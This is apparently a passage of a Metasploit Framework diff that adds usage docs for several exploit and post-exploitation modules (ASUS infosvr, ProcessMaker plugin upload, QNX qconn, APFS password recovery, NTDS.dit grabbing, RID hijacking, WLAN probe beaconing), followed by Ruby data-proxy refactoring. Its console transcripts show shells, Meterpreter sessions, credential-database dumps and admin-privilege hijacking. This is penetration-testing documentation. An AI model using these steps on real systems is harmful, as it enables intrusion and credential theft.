The port for Telnetd to bind (default: `4444`)
|
||||
|
||||
**TelnetTimeout**
|
||||
|
||||
The number of seconds to wait for connection to telnet (default: `10`)
|
||||
|
||||
**TelnetBannerTimeout**
|
||||
|
||||
The number of seconds to wait for the telnet banner (default: `25`)
|
||||
|
||||
**CommandShellCleanupCommand**
|
||||
|
||||
A command to run before the session is closed (default: `exit`)
|
||||
|
||||
If the session is killed (CTRL+C) rather than exiting cleanly,
|
||||
the telnet port remains open, but is unresponsive, and prevents
|
||||
re-exploitation until the device is rebooted.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
|
||||
rhost => 10.1.1.1
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
|
||||
telnetport => 4444
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run
|
||||
|
||||
[*] 10.1.1.1 - Starting telnetd on port 4444...
|
||||
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
|
||||
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
|
||||
[*] 10.1.1.1 - Trying to establish a telnet session...
|
||||
[+] 10.1.1.1 - Telnet session successfully established...
|
||||
[*] Found shell.
|
||||
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500
|
||||
|
||||
id
|
||||
/bin/sh: id: not found
|
||||
# cat /proc/version
|
||||
cat /proc/version
|
||||
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
|
||||
# exit
|
||||
exit
|
||||
```
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module does not exploit a particular vulnerability. It passively listens
|
||||
for an incoming connection from a secondary exploit or payload. In addition,
|
||||
this module provides an unforgettable luncheon experience.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/hams/steamed```
|
||||
3. Do: ```set payload [any payload]```
|
||||
4. Do: ```set target [0 or 1]```
|
||||
4. Do: ```exploit```
|
||||
5. Enjoy
|
||||
|
||||
## Options
|
||||
|
||||
**VERBOSE**
|
||||
|
||||
This option will further enhance the experience.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Target 0: Your roast is ruined! Will fast food suffice?
|
||||
|
||||
Target 1: You crash on an alien planet. Will you ever play the piano again?
|
|
@ -0,0 +1,88 @@
|
|||
## Description
|
||||
|
||||
This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.
|
||||
|
||||
Credentials for a valid user account with Administrator roles are required to run this module.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.
|
||||
|
||||
This module has been tested successfully on ProcessMaker versions:
|
||||
|
||||
* 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1
|
||||
* 3.2.0 on Debian Linux 8
|
||||
|
||||
Source and Installers:
|
||||
|
||||
* [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/multi/http/processmaker_plugin_upload`
|
||||
3. Do: `set RHOST [IP]`
|
||||
4. Do: `set USERNAME [USERNAME]` (default: `admin`)
|
||||
5. Do: `set PASSWORD [PASSWORD]` (default: `admin`)
|
||||
6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`)
|
||||
7. Do: `run`
|
||||
8. You should get a session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**Username**
|
||||
|
||||
The username for a ProcessMaker user with Administrator roles (default: `admin`).
|
||||
|
||||
**Password**
|
||||
|
||||
The password for the ProcessMaker user (default: `admin`).
|
||||
|
||||
The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x.
|
||||
|
||||
For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.
|
||||
|
||||
However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively.
|
||||
|
||||
**Workspace**
|
||||
|
||||
The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`)
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/processmaker_plugin_upload
|
||||
msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202
|
||||
rhost => 172.16.191.202
|
||||
msf exploit(processmaker_plugin_upload) > set username admin
|
||||
username => admin
|
||||
msf exploit(processmaker_plugin_upload) > set password admin
|
||||
password => admin
|
||||
msf exploit(processmaker_plugin_upload) > set workspace sample
|
||||
workspace => sample
|
||||
msf exploit(processmaker_plugin_upload) > set rport 8080
|
||||
rport => 8080
|
||||
msf exploit(processmaker_plugin_upload) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] Authenticating as user 'admin'
|
||||
[+] 172.16.191.202:8080 Authenticated as user 'admin'
|
||||
[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
|
||||
[*] Sending stage (33986 bytes) to 172.16.191.202
|
||||
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: user (1000)
|
||||
meterpreter > sysinfo
|
||||
Computer : debian
|
||||
OS : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
|
||||
Meterpreter : php/linux
|
||||
```
|
||||
|
|
@ -0,0 +1,60 @@
|
|||
## Description
|
||||
|
||||
This module uses the qconn daemon on [QNX](http://www.qnx.com/)
|
||||
systems to gain a shell.
|
||||
|
||||
The QNX qconn daemon does not require authentication and allows
|
||||
remote users to execute arbitrary operating system commands.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The QNX qconn daemon is a service provider that provides support,
|
||||
such as profiling system information, to remote IDE components.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* QNX Neutrino 6.5.0 (x86)
|
||||
* QNX Neutrino 6.5.0 SP1 (x86)
|
||||
|
||||
QNX Neutrino 6.5.0 Service Pack 1 is available here:
|
||||
|
||||
* http://www.qnx.com/download/feature.html?programid=23665
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/unix/misc/qnx_qconn_exec`
|
||||
3. `set rhost <IP>`
|
||||
4. `set rport <PORT>`
|
||||
5. `run`
|
||||
6. You should get a session
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
```
|
||||
msf5 > use exploit/unix/misc/qnx_qconn_exec
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215
|
||||
rhost => 172.16.191.215
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000
|
||||
rport => 8000
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > run
|
||||
|
||||
[*] 172.16.191.215:8000 - Sending payload...
|
||||
[+] 172.16.191.215:8000 - Payload sent successfully
|
||||
[*] Found shell.
|
||||
[*] Command shell session 1 opened (172.16.191.188:33641 -> 172.16.191.215:8000) at 2018-03-21 00:19:37 -0400
|
||||
|
||||
|
||||
0oxdgl2UgHIvCYBO
|
||||
# id
|
||||
id
|
||||
uid=0(root) gid=0(root)
|
||||
# uname -a
|
||||
uname -a
|
||||
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
|
||||
```
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
This module uses a vulnerability in macOS High Sierra's `log` command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
* macOS 10.13.0
|
||||
* macOS 10.13.1
|
||||
* macOS 10.13.2
|
||||
* macOS 10.13.3*
|
||||
|
||||
|
||||
\* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system upgrade to 10.13.3. See [here](https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp) for more info
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps to verify the module:
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use post/osx/gather/apfs_encrypted_volume_passwd`
|
||||
3. Do: set the `MOUNT_PATH` option if needed
|
||||
4. Do: ```run```
|
||||
5. You should get the password
|
||||
|
||||
## Options
|
||||
|
||||
**MOUNT_PATH**
|
||||
|
||||
`MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`
|
||||
|
||||
## Scenarios
|
||||
|
||||
Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
|
||||
|
||||
```
|
||||
msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
|
||||
|
||||
[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
|
||||
[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
|
||||
[*] Post module execution completed
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
|
||||
```
|
|
@ -0,0 +1,58 @@
|
|||
## Creating A Testing Environment
|
||||
To use this module you need a Meterpreter session on a domain controller.
|
||||
The Meterpreter session has to have SYSTEM privileges.
|
||||
PowerShell has to be installed.
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
1. Windows Server 2008r2
|
||||
|
||||
This module was not tested against, but may work against:
|
||||
|
||||
1. Other versions of Windows server.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Obtain a Meterpreter session via whatever method.
|
||||
3. Ensure the Meterpreter session has SYSTEM privileges.
|
||||
4. Ensure PowerShell is installed.
|
||||
5. Do: 'use post/windows/gather/ntds_grabber'
|
||||
6. Do: 'set session #'
|
||||
7. Do: 'run'
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Server 2008r2 with an x86 meterpreter
|
||||
|
||||
msf exploit(psexec) > use post/windows/gather/ntds_grabber
|
||||
msf post(ntds_grabber) > set session #
|
||||
session => #
|
||||
msf post(ntds_grabber) > run
|
||||
|
||||
[+] [2017.04.05-12:26:49] Running as SYSTEM
|
||||
[+] [2017.04.05-12:26:50] Running on a domain controller
|
||||
[+] [2017.04.05-12:26:50] PowerShell is installed.
|
||||
[-] [2017.04.05-12:26:50] The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!
|
||||
[*] [2017.04.05-12:26:50] Starting new x64 process C:\windows\sysnative\svchost.exe
|
||||
[+] [2017.04.05-12:26:51] Got pid 3088
|
||||
[*] [2017.04.05-12:26:51] Migrating..
|
||||
[+] [2017.04.05-12:26:56] Success!
|
||||
[*] [2017.04.05-12:26:56] Powershell Script executed
|
||||
[*] [2017.04.05-12:26:59] Creating All.cab
|
||||
[*] [2017.04.05-12:27:01] Waiting for All.cab
|
||||
[*] [2017.04.05-12:27:02] Waiting for All.cab
|
||||
[+] [2017.04.05-12:27:02] All.cab should be created in the current working directory
|
||||
[*] [2017.04.05-12:27:05] Downloading All.cab
|
||||
[+] [2017.04.05-12:27:15] All.cab saved in: /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab
|
||||
[*] [2017.04.05-12:27:15] Removing All.cab
|
||||
[+] [2017.04.05-12:27:15] All.cab Removed
|
||||
[*] Post module execution completed
|
||||
msf post(ntds_grabber) > loot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
10.100.0.2 Cabinet File All.cab application/cab Cabinet file containing SAM, SYSTEM and NTDS.dit /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab
|
|
@ -0,0 +1,144 @@
|
|||
## Overview
|
||||
|
||||
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine.
|
||||
|
||||
Taking advantage of some Windows Local Users Management integrity issues, this module will allow an attacker to authenticate with one known account's credentials (like the GUEST account), and access with the privileges of another existing account (like the ADMINISTRATOR account), even if the spoofed account is disabled.
|
||||
|
||||
By using a `meterpreter` session against a Windows host, the module will try to acquire _**SYSTEM**_ privileges if needed, and will modify some attributes to hijack the permissions of an existing local account and set them to another one.
|
||||
|
||||
For more information see [csl.com.co](http://csl.com.co/rid-hijacking/).
|
||||
|
||||
## Vulnerable Software
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
- Windows XP, 2003. (32 bits)
|
||||
- Windows 8.1 Pro. (64 bits)
|
||||
- Windows 10. (64 bits)
|
||||
- Windows Server 2012. (64 bits)
|
||||
|
||||
This module was not tested against, but may work on:
|
||||
|
||||
- Other versions of windows (x86 and x64).
|
||||
|
||||
## Options
|
||||
|
||||
- **GETSYSTEM**: Try to get _**SYSTEM**_ privileges on the victim. Default: `false`
|
||||
|
||||
- **GUEST_ACCOUNT**: Use the _**GUEST**_ built-in account as the destination of the privileges to be hijacked. Set this account as the _hijacker_. Default: `false`.
|
||||
|
||||
- **SESSION**: The session to run this module on. Default: `none`.
|
||||
|
||||
- **USERNAME**: Set the user account (_SAM Account Name_) of the victim host which will be the destination of the privileges to be _hijacked_. Set this account as the _hijacker_. If **GUEST_ACCOUNT** option is set to `true`, this parameter will be ignored if defined. Default: `none`.
|
||||
|
||||
- **PASSWORD**: Set or change the password of the account defined as the destination of the privileges to be hijacked, either _**GUEST**_ account or the user account set in **USERNAME** option. Set password to the _hijacker_ account. Default: `none`.
|
||||
|
||||
- **RID**: Specify the RID number in decimal of the _victim account_. This number should be the RID of an existing account on the target host, no matter if it is disabled (i.e.: The RID of the _**Administrator**_ built-in account is 500). Set the RID owned by the account that will be _hijacked_. Default: `500`
|
||||
|
||||
## Verification steps
|
||||
|
||||
1. Get a `meterpreter` session on some host.
|
||||
2. Do: `use post/windows/manage/rid_hijack`
|
||||
3. Do: `set SESSION <SESSION_ID>` replacing <SESSION_ID> with the desired session.
|
||||
4. Do: `set GETSYSTEM true`.
|
||||
5. Do: `set GUEST_ACCOUNT true`.
|
||||
6. Do: `run`
|
||||
7. Log in on the victim host with the GUEST account credentials.
|
||||
|
||||
## Scenarios
|
||||
### Assigning Administrator privileges to Guest built-in account.
|
||||
```
|
||||
msf post(rid_hijack) > set GETSYSTEM true
|
||||
GETSYSTEM => true
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT true
|
||||
GUEST_ACCOUNT => true
|
||||
msf post(rid_hijack) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Target account: Guest Account
|
||||
[*] Target account username: Invitado
|
||||
[*] Target account RID: 501
|
||||
[*] Account is disabled, activating...
|
||||
[+] Target account enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 500 is set to the account Invitado with original RID 501
|
||||
[*] Post module execution completed
|
||||
```
|
||||
#### Results after logging in as the Guest account.
|
||||
|
||||
![guest_account](https://user-images.githubusercontent.com/14118912/36490462-4bf84d68-16f6-11e8-811c-bf2d8c42b93d.PNG)
|
||||
|
||||
### Assigning Administrator privileges to local custom account.
|
||||
```
|
||||
msf post(rid_hijack) > set GETSYSTEM true
|
||||
GETSYSTEM => true
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT false
|
||||
GUEST_ACCOUNT => false
|
||||
msf post(rid_hijack) > set USERNAME testuser
|
||||
USERNAME => testuser
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Checking users...
|
||||
[+] Found testuser account!
|
||||
[*] Target account username: testuser
|
||||
[*] Target account RID: 1002
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 500 is set to the account testuser with original RID 1002
|
||||
[*] Post module execution completed
|
||||
```
|
||||
#### Results after logging in as the _testuser_ account.
|
||||
![testuser](https://user-images.githubusercontent.com/14118912/36490561-837bd2f0-16f6-11e8-8dc6-53283bb4d9ea.PNG)
|
||||
|
||||
### Assigning custom privileges to Guest built-in account and setting new password to Guest.
|
||||
```
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT true
|
||||
GUEST_ACCOUNT => true
|
||||
msf post(rid_hijack) > set RID 1002
|
||||
RID => 1002
|
||||
msf post(rid_hijack) > set PASSWORD Password.1
|
||||
PASSWORD => Password.1
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Target account: Guest Account
|
||||
[*] Target account username: Invitado
|
||||
[*] Target account RID: 501
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 1002 is set to the account Invitado with original RID 501
|
||||
[*] Setting Invitado password to Password.1
|
||||
[*] Post module execution completed
|
||||
```
|
||||
### Assigning custom privileges to local custom account and setting new password to custom account.
|
||||
```
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT false
|
||||
GUEST_ACCOUNT => false
|
||||
msf post(rid_hijack) > set USERNAME testuser
|
||||
USERNAME => testuser
|
||||
msf post(rid_hijack) > set PASSWORD Password.2
|
||||
PASSWORD => Password.2
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Checking users...
|
||||
[+] Found testuser account!
|
||||
[*] Target account username: testuser
|
||||
[*] Target account RID: 1002
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 1002 is set to the account testuser with original RID 1002
|
||||
[*] Setting testuser password to Password.2
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,113 @@
|
|||
## Description
|
||||
The module sends probe request packets through the wlan interfaces. The user can configure the message to be sent
|
||||
(embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets
|
||||
(considering a sleep of 10 seconds between each probe request).
|
||||
|
||||
The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the
|
||||
wlanscan API and the DOT11_SSID structure).
|
||||
|
||||
## Scenarios
|
||||
|
||||
This post module uses the remote victim's wireless card to beacon a specific SSID, allowing an attacker to
|
||||
geolocate him or her during an engagement.
|
||||
|
||||
## Verification Steps
|
||||
### Run the module on a remote computer:
|
||||
```
|
||||
msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
|
||||
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(handler) > set lhost 192.168.135.111
|
||||
lhost => 192.168.135.111
|
||||
msf exploit(handler) > set lport 4567
|
||||
lport => 4567
|
||||
msf exploit(handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.135.111:4567
|
||||
[*] Starting the payload handler...
|
||||
[*] Sending stage (957487 bytes) to 192.168.135.157
|
||||
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN10X64-1703
|
||||
OS : Windows 10 (Build 15063).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(handler) > use post/windows/wlan/wlan_probe_request
|
||||
msf post(wlan_probe_request) > set ssid "TEST"
|
||||
ssid => TEST
|
||||
msf post(wlan_probe_request) > set timeout 300
|
||||
timeout => 300
|
||||
msf post(wlan_probe_request) > set session 1
|
||||
session => 1
|
||||
msf post(wlan_probe_request) > run
|
||||
|
||||
[*] Wlan interfaces found: 1
|
||||
[*] Sending probe requests for 300 seconds
|
||||
^C[-] Post interrupted by the console user
|
||||
[*] Post module execution completed
|
||||
msf post(wlan_probe_request) >
|
||||
```
|
||||
|
||||
|
||||
|
||||
### On another computer, use probemon to listen for the SSID:
|
||||
```
|
||||
tmoose@ubuntu:~/rapid7$ ifconfig -a
|
||||
.
|
||||
.
|
||||
.
|
||||
wlx00c0ca6d1287 Link encap:Ethernet HWaddr 00:00:00:00:00:00
|
||||
UP BROADCAST MULTICAST MTU:1500 Metric:1
|
||||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||||
collisions:0 txqueuelen:1000
|
||||
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
|
||||
|
||||
tmoose@ubuntu:~/rapid7$ sudo airmon-ng start wlx00c0ca6d1287
|
||||
|
||||
|
||||
Found 6 processes that could cause trouble.
|
||||
If airodump-ng, aireplay-ng or airtun-ng stops working after
|
||||
a short period of time, you may want to kill (some of) them!
|
||||
|
||||
PID Name
|
||||
963 NetworkManager
|
||||
981 avahi-daemon
|
||||
1002 avahi-daemon
|
||||
1170 dhclient
|
||||
1180 dhclient
|
||||
1766 wpa_supplicant
|
||||
|
||||
|
||||
Interface Chipset Driver
|
||||
|
||||
wlx000000000000 Realtek RTL8187L rtl8187 - [phy0]
|
||||
(monitor mode enabled on mon0)
|
||||
|
||||
tmoose@ubuntu:~/rapid7$ cd ..
|
||||
|
||||
tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -59
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -73
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -68
|
||||
1524248956 74:ea:3a:8e:a1:6d TEST -74
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -59
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -60
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -74
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -73
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -78
|
||||
|
||||
.
|
||||
.
|
||||
.
|
||||
|
||||
```
|
|
@ -27,11 +27,15 @@ module DataService
|
|||
include LootDataService
|
||||
|
||||
def name
|
||||
raise 'DataLService#name is not implemented';
|
||||
raise 'DataService#name is not implemented';
|
||||
end
|
||||
|
||||
def active
|
||||
raise 'DataLService#active is not implemented';
|
||||
raise 'DataService#active is not implemented';
|
||||
end
|
||||
|
||||
def is_local?
|
||||
raise 'DataService#is_local? is not implemented';
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -41,11 +45,14 @@ module DataService
|
|||
attr_reader :id
|
||||
attr_reader :name
|
||||
attr_reader :active
|
||||
attr_reader :is_local
|
||||
|
||||
def initialize (id, name, active)
|
||||
def initialize (id, name, active, is_local)
|
||||
self.id = id
|
||||
self.name = name
|
||||
self.active = active
|
||||
self.is_local = is_local
|
||||
|
||||
end
|
||||
|
||||
#######
|
||||
|
@ -55,6 +62,7 @@ module DataService
|
|||
attr_writer :id
|
||||
attr_writer :name
|
||||
attr_writer :active
|
||||
attr_writer :is_local
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -27,13 +27,13 @@ class DataProxy
|
|||
#
|
||||
def error
|
||||
return @error if (@error)
|
||||
return @current_data_service.error if @current_data_service
|
||||
return 'none'
|
||||
return @current_data_service.error if @current_data_service && !@current_data_service.error.nil?
|
||||
return 'unknown'
|
||||
end
|
||||
|
||||
def is_local?
|
||||
if (@current_data_service)
|
||||
return (@current_data_service.name == 'local_db_service')
|
||||
if @current_data_service
|
||||
return @current_data_service.is_local?
|
||||
end
|
||||
|
||||
return false
|
||||
|
@ -43,7 +43,7 @@ class DataProxy
|
|||
# Determines if the data service is active
|
||||
#
|
||||
def active
|
||||
if (@current_data_service)
|
||||
if @current_data_service
|
||||
return @current_data_service.active
|
||||
end
|
||||
|
||||
|
@ -66,11 +66,11 @@ class DataProxy
|
|||
#
|
||||
def set_data_service(data_service_id, online=false)
|
||||
data_service = @data_services[data_service_id.to_i]
|
||||
if (data_service.nil?)
|
||||
if data_service.nil?
|
||||
raise "Data service with id: #{data_service_id} does not exist"
|
||||
end
|
||||
|
||||
if (!online && !data_service.active)
|
||||
if !online && !data_service.active
|
||||
raise "Data service not online: #{data_service.name}, not setting as active"
|
||||
end
|
||||
|
||||
|
@ -85,7 +85,8 @@ class DataProxy
|
|||
@data_services.each_key {|key|
|
||||
name = @data_services[key].name
|
||||
active = !@current_data_service.nil? && name == @current_data_service.name
|
||||
services_metadata << Metasploit::Framework::DataService::Metadata.new(key, name, active)
|
||||
is_local = @data_services[key].is_local?
|
||||
services_metadata << Metasploit::Framework::DataService::Metadata.new(key, name, active, is_local)
|
||||
}
|
||||
|
||||
services_metadata
|
||||
|
@ -95,7 +96,6 @@ class DataProxy
|
|||
# Used to bridge the local db
|
||||
#
|
||||
def method_missing(method, *args, &block)
|
||||
dlog ("Attempting to delegate method: #{method}")
|
||||
unless @current_data_service.nil?
|
||||
@current_data_service.send(method, *args, &block)
|
||||
end
|
||||
|
@ -122,6 +122,29 @@ class DataProxy
|
|||
raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
|
||||
end
|
||||
|
||||
# Adds a valid workspace value to the opts hash before sending on to the data layer.
|
||||
#
|
||||
# @param [Hash] opts The opts hash that will be passed to the data layer.
|
||||
# @param [String] wspace A specific workspace name to add to the opts hash.
|
||||
# @return [Hash] The opts hash with a valid :workspace value added.
|
||||
def add_opts_workspace(opts, wspace = nil)
|
||||
# Some methods use the key :wspace. Let's standardize on :workspace and clean it up here.
|
||||
opts[:workspace] = opts.delete(:wspace) unless opts[:wspace].nil?
|
||||
|
||||
# If the user passed in a specific workspace then use that in opts
|
||||
opts[:workspace] = wspace if wspace
|
||||
|
||||
# We only want to pass the workspace name, so grab it if it is currently an object.
|
||||
if opts[:workspace] && opts[:workspace].is_a?(::Mdm::Workspace)
|
||||
opts[:workspace] = opts[:workspace].name
|
||||
end
|
||||
|
||||
# If we still don't have a :workspace value, just set it to the current workspace.
|
||||
opts[:workspace] = workspace.name if opts[:workspace].nil?
|
||||
|
||||
opts
|
||||
end
|
||||
|
||||
#######
|
||||
private
|
||||
#######
|
||||
|
|
|
@ -2,7 +2,7 @@ module CredentialDataProxy
|
|||
|
||||
def create_credential(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.create_credential(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem creating credential")
|
||||
|
@ -12,6 +12,7 @@ module CredentialDataProxy
|
|||
def creds(opts = {})
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.creds(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving credentials")
|
||||
|
|
|
@ -17,6 +17,7 @@ module DataProxyAutoLoader
|
|||
autoload :CredentialDataProxy, 'metasploit/framework/data_service/proxy/credential_data_proxy'
|
||||
autoload :NmapDataProxy, 'metasploit/framework/data_service/proxy/nmap_data_proxy'
|
||||
autoload :DbExportDataProxy, 'metasploit/framework/data_service/proxy/db_export_data_proxy'
|
||||
autoload :DbImportDataProxy, 'metasploit/framework/data_service/proxy/db_import_data_proxy'
|
||||
autoload :VulnAttemptDataProxy, 'metasploit/framework/data_service/proxy/vuln_attempt_data_proxy'
|
||||
|
||||
include ServiceDataProxy
|
||||
|
@ -33,5 +34,6 @@ module DataProxyAutoLoader
|
|||
include CredentialDataProxy
|
||||
include NmapDataProxy
|
||||
include DbExportDataProxy
|
||||
include DbImportDataProxy
|
||||
include VulnAttemptDataProxy
|
||||
end
|
|
@ -6,6 +6,7 @@ module DbExportDataProxy
|
|||
path: path,
|
||||
format: format
|
||||
}
|
||||
add_opts_workspace(opts)
|
||||
data_service.run_db_export(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem generating DB Export")
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
module DbImportDataProxy
|
||||
def import(opts, &block)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.import(opts, &block)
|
||||
rescue Exception => e
|
||||
